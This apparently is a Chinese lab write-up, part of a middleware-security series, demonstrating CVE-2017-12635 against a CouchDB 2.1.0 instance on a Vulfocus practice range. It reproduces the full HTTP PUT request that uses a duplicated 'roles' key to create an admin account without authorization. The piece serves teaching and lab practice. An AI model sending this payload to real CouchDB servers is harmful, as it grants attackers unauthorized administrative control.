中间件安全(二)
本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。
前言:
前文链接:中间件安全(一)
本文主要讲解Couchdb数据库未授权越权漏洞(CVE-2017-12635)。
靶场链接:Vulfocus 漏洞威胁分析平台
一,靶场界面简介。
可以看到开放了三个端口,尝试后发现,仅http://123.58.224.8:35469 可以打开,打开后界面如下:
并无什么有价值的信息。
点击原始数据后,可以发现确实为Couchdb数据库,并且版本为:2.1.0(注意CVE-2017-12635影响版本:小于 1.7.0 以及 小于 2.1.1)。
访问/_utils目录。
couchdb/_utils目录简介:
可以看到,网页自动跳转到登录界面。
二,进行攻击。
随机输入账号密码并使用bp进行抓包。
可以看到,登录失败。
右键,将其发送到重发器。
本漏洞可以绕过创建权限而去实现任意创建admin权限的账号 实现登录。
使用从数据包,正常新建用户:
POST /_session HTTP/1.1
Host: 123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"password": "vulhub"
}
失败。
使用绕过权限数据包:
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: http://123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 112
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}
成功。
使用账号密码(vulhub,vulhub
)进行测试。
成功。